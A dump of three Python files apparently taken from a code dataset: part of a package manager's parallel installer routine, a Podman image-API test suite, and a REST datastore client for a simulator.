log_info('Finished Rapid Download', metadata.logfile)
write(
'Using Rapid Install, Accept Prompts Asking For Admin Permission...', 'cyan', metadata)
log_info(
'Using Rapid Install To Complete Setup, Accept Prompts Asking For Admin Permission...', metadata.logfile)
return paths
def generate_installers(self, paths) -> list:
install_items = []
packets = self.packets
install_items = []
if len(packets) > 1:
for pack in packets:
for path in paths.items():
if pack.display_name == path[1]['display_name']:
install_items.append(Install(
pack.display_name, path[1]['path'], pack.install_switches, pack.win64_type, pack.directory, pack.custom_location, self.metadata))
else:
return Install(packets[0].display_name, paths[0][1]['display_name'], packets[0].install_switche, packets[0].win64_type, packets[0].directory, packets[0].custom_location, self.metadata)
return self.generate_split(install_items)
def generate_split(self, install_items) -> list:
exe_list = []
msi_list = []
other_list = []
for item in install_items:
if item.download_type == '.exe':
exe_list.append(item)
elif item.download_type == '.msi':
msi_list.append(item)
else:
other_list.append(item)
install_items = [exe_list, msi_list, other_list]
return install_items
def handle_multi_install(self, paths):
write_debug('Initialising Rapid Install Procedure...', self.metadata)
processes = []
install_items = self.generate_installers(paths)
idx = 0
for item in install_items:
is_msi = False
try:
item[1]
is_msi = True
except IndexError:
is_msi = False
try:
item[idx]
is_msi = True
except IndexError:
is_msi = False
if is_msi:
if item[idx] == item[1]:
for val in item:
self.install_package(val)
if item:
for val in item:
write_debug(f'Running Installer For <{val.display_name}> On Thread {item.index(val)}', self.metadata)
processes.append(
Process(target=self.install_package, args=(val,)))
for process in processes:
process.start()
for x in processes:
x.join()
processes.clear()
idx += 1
if self.metadata.reduce_package:
for path in paths:
os.remove(path)
write('Successfully Cleaned Up Installer From Temp Directory...',
'green', self.metadata)
write(
'Successfully Installed Packages!', 'bright_magenta', self.metadata)
log_info('Successfully Installed Packages!', self.metadata.logfile)
log_info('Refreshing Environment Variables', self.metadata.logfile)
write_debug(
'Refreshing Env Variables, Calling Batch Script', self.metadata)
write_verbose('Refreshing Environment Variables', self.metadata)
start = timer()
refresh_environment_variables()
end = timer()
write_debug(f'Successfully Refreshed Environment Variabled in {round((end - start), 2)} seconds', self.metadata)
write_verbose('Installation and setup completed.', self.metadata)
log_info('Installation and setup completed.', self.metadata.logfile)
write_debug(
f'Terminated debugger at {strftime("%H:%M:%S")} on install::completion', self.metadata)
log_info(
f'Terminated debugger at {strftime("%H:%M:%S")} on install::completion', self.metadata.logfile)
if self.metadata.logfile:
closeLog(self.metadata.logfile, 'Install')
|
test_v2_0_0_image.py | import json
import unittest
from multiprocessing import Process
import requests
from dateutil.parser import parse
from .fixtures import APITestCase
class ImageTestCase(APITestCase):
def test_list(self):
r = requests.get(self.podman_url + "/v1.40/images/json")
self.assertEqual(r.status_code, 200, r.text)
# See https://docs.docker.com/engine/api/v1.40/#operation/ImageList
required_keys = (
"Id",
"ParentId",
"RepoTags",
"RepoDigests",
"Created",
"Size",
"SharedSize",
"VirtualSize",
"Labels",
"Containers",
)
images = r.json()
self.assertIsInstance(images, list)
for item in images:
self.assertIsInstance(item, dict)
for k in required_keys:
self.assertIn(k, item)
def test_inspect(self):
r = requests.get(self.podman_url + "/v1.40/images/alpine/json")
self.assertEqual(r.status_code, 200, r.text)
# See https://docs.docker.com/engine/api/v1.40/#operation/ImageInspect
required_keys = (
"Id",
"Parent",
"Comment",
"Created",
"Container",
"DockerVersion",
"Author",
"Architecture",
"Os",
"Size",
"VirtualSize",
"GraphDriver",
"RootFS",
"Metadata",
)
image = r.json()
self.assertIsInstance(image, dict)
for item in required_keys:
self.assertIn(item, image)
_ = parse(image["Created"])
def test_delete(self):
r = requests.delete(self.podman_url + "/v1.40/images/alpine?force=true")
self.assertEqual(r.status_code, 200, r.text)
self.assertIsInstance(r.json(), list)
def test_pull(self):
r = requests.post(self.uri("/images/pull?reference=alpine"), timeout=15)
self.assertEqual(r.status_code, 200, r.status_code)
text = r.text
keys = {
"error": False,
"id": False,
"images": False,
"stream": False,
}
# Read and record stanza's from pull
for line in str.splitlines(text):
obj = json.loads(line)
key_list = list(obj.keys())
for k in key_list:
keys[k] = True
self.assertFalse(keys["error"], "Expected no errors")
self.assertTrue(keys["id"], "Expected to find id stanza")
self.assertTrue(keys["images"], "Expected to find images stanza")
self.assertTrue(keys["stream"], "Expected to find stream progress stanza's")
r = requests.post(self.uri("/images/pull?reference=alpine&quiet=true"), timeout=15)
self.assertEqual(r.status_code, 200, r.status_code)
text = r.text
keys = {
"error": False,
"id": False,
"images": False,
"stream": False,
}
# Read and record stanza's from pull
for line in str.splitlines(text):
obj = json.loads(line)
key_list = list(obj.keys())
for k in key_list:
keys[k] = True
self.assertFalse(keys["error"], "Expected no errors")
self.assertTrue(keys["id"], "Expected to find id stanza")
self.assertTrue(keys["images"], "Expected to find images stanza")
self.assertFalse(keys["stream"], "Expected to find stream progress stanza's")
def test_create(self):
r = requests.post(
self.podman_url + "/v1.40/images/create?fromImage=alpine&platform=linux/amd64/v8",
timeout=15,
)
self.assertEqual(r.status_code, 200, r.text)
r = requests.post(
self.podman_url
+ "/v1.40/images/create?fromSrc=-&repo=fedora&message=testing123&platform=linux/amd64",
timeout=15,
)
self.assertEqual(r.status_code, 200, r.text)
def test_search_compat(self):
url = self.podman_url + "/v1.40/images/search"
# Had issues with this test hanging when repositories not happy
def do_search1():
payload = {"term": "alpine"}
r = requests.get(url, params=payload, timeout=5)
self.assertEqual(r.status_code, 200, f"#1: {r.text}")
self.assertIsInstance(r.json(), list)
def do_search2():
payload = {"term": "alpine", "limit": 1}
r = requests.get(url, params=payload, timeout=5)
self.assertEqual(r.status_code, 200, f"#2: {r.text}")
results = r.json()
self.assertIsInstance(results, list)
self.assertEqual(len(results), 1)
def do_search3():
# FIXME: Research if quay.io supports is-official and which image is "official"
return
payload = {"term": "thanos", "filters": '{"is-official":["true"]}'}
r = requests.get(url, params=payload, timeout=5)
self.assertEqual(r.status_code, 200, f"#3: {r.text}")
results = r.json()
self.assertIsInstance(results, list)
# There should be only one official image
self.assertEqual(len(results), 1)
def do_search4():
headers = {"X-Registry-Auth": "null"}
payload = {"term": "alpine"}
r = requests.get(url, params=payload, headers=headers, timeout=5)
self.assertEqual(r.status_code, 200, f"#4: {r.text}")
def do_search5():
headers = {"X-Registry-Auth": "invalid value"}
payload = {"term": "alpine"}
r = requests.get(url, params=payload, headers=headers, timeout=5)
self.assertEqual(r.status_code, 400, f"#5: {r.text}")
i = 1
for fn in [do_search1, do_search2, do_search3, do_search4, do_search5]:
with self.subTest(i=i):
search = Process(target=fn)
search.start()
search.join(timeout=10)
self.assertFalse(search.is_alive(), f"#{i} /images/search took too long")
# search_methods = [do_search1, do_search2, do_search3, do_search4, do_search5]
# for search_method in search_methods:
# search = Process(target=search_method)
# search.start()
# search.join(timeout=10)
# self.assertFalse(search.is_alive(), "/images/search took too long")
def test_history(self):
r = requests.get(self.podman_url + "/v1.40/images/alpine/history")
self.assertEqual(r.status_code, 200, r.text)
# See https://docs.docker.com/engine/api/v1.40/#operation/ImageHistory
required_keys = ("Id", "Created", "CreatedBy", "Tags", "Size", "Comment")
changes = r.json()
self.assertIsInstance(changes, list)
for change in changes:
self.assertIsInstance(change, dict)
for k in required_keys:
self.assertIn(k, change)
def test_tree(self):
r = requests.get(self.uri("/images/alpine/tree"))
self.assertEqual(r.status_code, 200, r.text)
tree = r.json()
self.assertTrue(tree["Tree"].startswith("Image ID:"), r.text)
if __name__ == "__main__":
unittest.main()
|
datastore.py | from abc import abstractmethod
import requests
import json
import os
import logging
from logging import Logger
from collections import namedtuple
from typing import Any, Optional
from queue import Queue
from threading import Thread, Timer
from itsim.datastore.datastore_server import DatastoreRestServer
from itsim.logging import create_logger
from uuid import uuid4, UUID
import tempfile
class DatastoreClient:
"""
Base class for datastore client implementation
"""
def __init__(self, **kwargs):
pass
@abstractmethod
def load_item(self, item_type: str, uuid: UUID, from_time: str = None, to_time: str = None) -> str:
pass
@abstractmethod
def store_item(self, data: Any, overwrite: bool = True) -> None:
pass
@abstractmethod
def delete(self, item_type: str, uuid: UUID):
pass
class DatastoreRestClient(DatastoreClient):
def __init__(self, hostname: str = '0.0.0.0', port: int = 5000, sim_uuid: UUID = uuid4()) -> None:
self._sim_uuid = sim_uuid
self._headers = {'Accept': 'application/json'}
self._url = f'http://{hostname}:{port}/'
self._started_server = False
if not self.server_is_alive():
_, self._db_file = tempfile.mkstemp(suffix=".sqlite")
port = self.launch_server_thread(hostname)
self._started_server = True
self._url = f'http://{hostname}:{port}/'
print(f"Couldn't find server, launching a local instance: {self._url}")
def __del__(self) -> None:
"""
Shuts down the datastore server if it was created by constructor
"""
timeout_thr_join = 5.0
if self._started_server:
response = requests.post(f'{self._url}stop')
if response.status_code != 200:
raise RuntimeError("Error shutting down the Datastore Server.")
self._thr.join(timeout=timeout_thr_join)
if os.path.isfile(self._db_file):
os.remove(self._db_file)
def server_is_alive(self) -> bool:
try:
is_alive_url = f'{self._url}isrunning/{self._sim_uuid}'
print(is_alive_url)
page = requests.get(is_alive_url)
return page.status_code == 200
except Exception:
return False
def launch_server_thread(self, hostname) -> int:
def start_and_run_server(server, hostname, queue_port):
for port in range(5000, 2 ** 16 - 1):
timer = None
try:
timer = Timer(0.05, lambda: queue_port.put(port))
timer.start()
server.run(host=hostname, port=port, debug=False)
return
except OSError as err:
if err.errno == 97: # Port already in use.
if timer is not None:
timer.cancel()
# At this point, we were unable to find a suitable port -- fail.
queue_port.put(0)
server = DatastoreRestServer(type="sqlite", sqlite_file=self._db_file)
queue_port: Queue = Queue()
self._thr = Thread(target=start_and_run_server, args=(server, hostname, queue_port))
self._thr.start()
port = queue_port.get()
if port == 0:
raise RuntimeError('Unable to start the datastore server')
return port
# Creating the logger for console and datastore output
def create_logger(self,
logger_name: str = __name__,
console_level=logging.DEBUG,
datastore_level=logging.DEBUG) -> Logger:
return create_logger(logger_name,
self._sim_uuid,
self._url,
console_level,
datastore_level)
def load_item(self, item_type: str, uuid: UUID, from_time: Optional[str] = None,
to_time: Optional[str] = None) -> str:
"""
Requests GET
"""
response = requests.get(f'{self._url}{item_type}/{str(uuid)}',
headers=self._headers,
json={'from_time': from_time, 'to_time': to_time})
if response.status_code not in range(200, 299):
raise RuntimeError("Error raised while loading data from server")
return ''
else:
return json.loads(json.loads(response.content),
object_hook=lambda d: namedtuple('X', d.keys())(*d.values()))
def store_item(self, data: Any, overwrite: Optional[bool] = True) -> None:
"""
Requests POST
"""
response = requests.post(f'{self._url}{data.type}/{data.uuid}',
headers=self._headers,
json=data)
if response.status_code not in range(200, 299):
raise RuntimeError("Error raised while storing data on server")
def delete(self, item_type: str, uuid: UUID) -> None:
pass
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.